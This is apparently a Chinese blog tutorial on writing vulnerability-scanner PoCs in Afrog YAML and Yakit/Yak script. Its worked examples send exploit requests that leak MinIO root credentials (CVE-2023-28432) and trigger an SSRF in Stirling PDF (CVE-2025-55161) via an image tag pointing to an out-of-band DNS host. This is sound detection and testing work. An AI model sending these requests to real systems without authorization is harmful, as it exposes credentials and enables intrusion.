当前位置: 首页 > news >正文

漏扫发现-Web服务篇Poc开发Yakit插件编写Afrog项目Yaml语法Yak语言接受匹配

知识点:
Poc开发-远程漏扫-Afrog项目&Yakit原生语法&模版插件

演示案例-Poc开发-远程漏扫-Afrog项目&Yakit原生语法&模版插件

一、Afrog Poc开发

官方POC规则写法:https://github.com/zan8in/afrog/wiki/Afrog-PoC-%E8%A7%84%E5%88%99%E7%BC%96%E5%86%99%E6%9D%83%E5%A8%81%E6%8C%87%E5%8D%97


1、MinIO集群模式信息泄露漏洞 (CVE-2023-28432)

靶场地址:https://github.com/vulhub/vulhub/tree/master/minio/CVE-2023-28432

测试:afrog.exe -t https://xx.xx.xx.xx:xxxx -P minio.yaml

id: CVE-2023-28432 info: name: My PoC demo1 author: xiaodisec severity: critical rules: r0: request: method: POST path: /minio/bootstrap/v1/verify headers: Content-Type: application/x-www-form-urlencoded expression: response.status==200&&response.body.bcontains(b'MINIO_ROOT_PASSWORD')expression: r0()

2、Stirling PDF SSRF漏洞 (CVE-2025-55161)

测试:afrog.exe -t https://xx.xx.xx.xx:xxxx -P SSRF.yaml --oob dnslogcn

id: CVE-2025-55161 info: name: My PoC demo2 author: xiaodisec severity: critical set: username: randomLowercase(6)rules: r0: request: method: POST path: /api/v1/convert/markdown/pdf headers: Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryvAfAbBmFpYrQfooK body:|- ------WebKitFormBoundaryvAfAbBmFpYrQfooK Content-Disposition: form-data;name="fileInput";filename="{{username}}.md"Content-Type: application/octet-stream<imgsrc='http://{{oob.DNS}}/'>------WebKitFormBoundaryvAfAbBmFpYrQfooK-- expression: oobCheck(oob.ProtocolDNS,5)expression: r0()

二、Yakit Poc插件开发


1、基于Nuclei Yaml语法

官方POC编写参考地址:https://www.yaklang.com/docs/security/cap8-4-yaml-poc




2、基于Yak原语言(不推荐该方法,比较麻烦)

loglevel(`info`)yakit.AutoInitYakit()sendPacket=func(target){returnpoc.HTTP(`POST /minio/bootstrap/v1/verify HTTP/1.1 Host:{{params(target)}}Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0(Windows NT10.0;Win64;x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/110.0.5481.178 Safari/537.36 Connection: close Cache-Control: max-age=0Content-Type: application/x-www-form-urlencoded Content-Length:0`, poc.params({"target":target,}),)}target=cli.String("target")iftarget==""{die("no target")}result="MINIO_ROOT_USER"rsp, _, err=sendPacket(target)die(err)headers, body=str.SplitHTTPHeadersAndBodyFromPacket(rsp)ifstr.MatchAllOfSubString(body, result){yakit.StatusCard("发现漏洞", target)log.info("find token: %v", result)}


http://www.jsqmd.com/news/1125360/

相关文章:

  • 2026知识付费平台全对比!新手开课首选平台汇总推荐
  • 华为 eNSP 安装完全指南(人民标准版 v3.0)
  • 一起动手学LangChain吧-从零创建一个agent
  • try-throw-catch异常捕获流程
  • Redis Stream 消息队列总结
  • CTF ECC基础离散对数爆破 解题Writeup
  • 调试排查工具介绍(gdb、strace、Valgrind等)
  • JBoss 6.1.0.Final 弱口令加固实战:3步修改 jmx-console-users.properties 默认密码
  • 基于51/STM32单片机智能电饭煲 电饭锅设计 温度加热预约13(设计源文件+万字报告+讲解)(支持资料、图片参考_相关定制)_文章底部可以扫码
  • Java 转大模型开发:后端程序员的升级路线,把工具链跑成稳定流程
  • Agent 云原生运行时:智能体也需要健康检查
  • CenterNet实战:从零搭建到模型测试的完整环境配置指南
  • GPT 输出不符合预期?从结构化提问到多轮优化的实用方法
  • CSS Cascade Layer:样式优先级要靠架构,不靠赌命名
  • Java毕设项目:中小型乡村民宿山庄综合业务管理系统的设计与实现 基于 Java 的民宿客户信息与消费记录管理系统 (源码+文档,讲解、调试运行,定制等)
  • AT 指令学习手册:从对话逻辑到实战排错
  • Avalonia NativeControlHost
  • 做过亲子游定制之后,才知道本地靠谱旅行社不能忽略
  • 基于51/STM32单片机温湿度检测控制系统 DHT11环境监测大棚报警器12(设计源文件+万字报告+讲解)(支持资料、图片参考_相关定制)_
  • 原神120帧解锁终极指南:免费提升游戏流畅度的完整教程
  • 104. GaN功率模块集成驱动与高频磁性元件设计
  • 不同规模企业如何选择RFID资产管理系统?一份务实的选型指南
  • 【大白话说Java面试题 第153题】【06_Spring篇】第13题:Spring 中 Bean 是线程安全的吗?
  • 预训练让时序模型零样本胜出
  • 大学生AI学习工具选择指南:ChatGPT、DeepSeek与Gemini实战适配
  • 外卖做了400单,到手不到1000块:一笔账背后的行业困局
  • Java毕业设计-基于 SpringBoot 的 Cosplay 交流论坛的设计与实现 前后端分离的二次元 Cosplay 分享社区平台(源码+LW+部署文档+全bao+远程调试+代码讲解等)
  • 基于STM32单片机车位引导 智能停车场计费系统 刷卡识别 WIFI成品12(设计源文件+万字报告+讲解)(支持资料、图片参考_相关定制)_
  • Skills 编写规范与经验指南
  • 服务器安全(Windows Server+Linux)